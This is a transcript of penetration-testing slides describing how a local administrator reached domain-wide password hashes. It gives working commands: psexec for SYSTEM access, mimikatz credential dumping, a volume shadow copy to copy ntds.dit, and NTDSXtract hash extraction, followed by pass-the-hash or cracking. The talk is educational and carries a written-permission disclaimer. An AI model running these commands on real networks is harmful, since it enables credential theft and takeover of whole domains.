fall of a domain | from local admin to domain user hashes
DESCRIPTION
Author: Riyaz WalikarTRANSCRIPT
LOCAL ADMIN TO DOMAIN USER HASHES
The Fall of a Domain
Riyaz Wa l i kar
Disclaimer
It was far more painstaking and complicated than this!
Demo setup to show execution path
All the commands were actually used in the pentest
Please do not try this on your office/corporate environment without written permission
Please exercise caution!
The story so far
Remote RDP access to a machine on the client network via VPN
Local Administrator rights to simulate an employee
User is a limited domain user
Domain controller on the same network, reachable with LDAP services running
Visually. This.
Local Admin eh?
Locally logged in as TARDIS\fwhite
Domain limited user but local admin
Other users connected? [Task Manager > Users]
Found another user connected to our system via RDP –sweet! (possibly domain admin )
Need system privs! Any ideas?
Think Sysinternals!
psexec –s –i cmd.exe
Dump connected user credentials
mimikatz – Benjamin Delpy
Extracts plaintext passwords from memory
Wdigest, tspkg, kerberos and many more
mimikatz privilege::debug token::elevate sekurlsa::logonPasswords
Windows (In)Security?
Now what?
http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?
RDP directly!
Lets be discreet
psexec -s –u TARDIS\atomboy \\10.10.10.1 cmd.exe
Game already over!
Instead RDP with user credentials and present report
Lets grab some hashes
Active Directory stores user information in %systemroot%\ntds\ntds.dit
Locked during system usage
ntdsutil + snapshot = backup (> Windows 2008)
vssadmin create shadow /for=C: (> Windows 2003)
Lets grab some hashes
backup readable by nt authority\system and administrators
We need the ntds.dit and SYSTEM files
cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies
copy works!
Core files needed
NTDS.dit structure parse?
NTDSXtract - A framework for offline forensic analysis of ntds.dit
Need the libesedb module as well
libesedb and creddump in ntds_dump_hashes.zip
wget to a linux box (Kali is a good choice)
get framework + compile + make + run
wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
wget http://ntdsxtract.com/downloads/ntds_dump_hash.zip
unzip both
get framework + compile + make + run
cd ntds_dump_hash/libesedb
./configure && make
cd libesedb/esedbtools
./esedbexport -l /tmp/ntds.log <ntds.dit>
Yay!
python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> –passwordhistory <system_file>
Cleanup the output with ntdstopwdump.py(https://raw.github.com/inquisb/
miscellaneous/master/ntdstopwdump.py)
Now what?
http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / Password Cracking!
Use the Windows Credentials Editor – Amplia Security
Password Cracking >> Humla perhaps
References
http://blog.gentilkiwi.com/mimikatzhttp://www.ampliasecurity.com/research/
wcefaq.htmlhttp://bernardodamele.blogspot.in/2011/12/
dump-windows-password-hashes_16.html
Thank you
[email protected]://www.riyazwalikar.com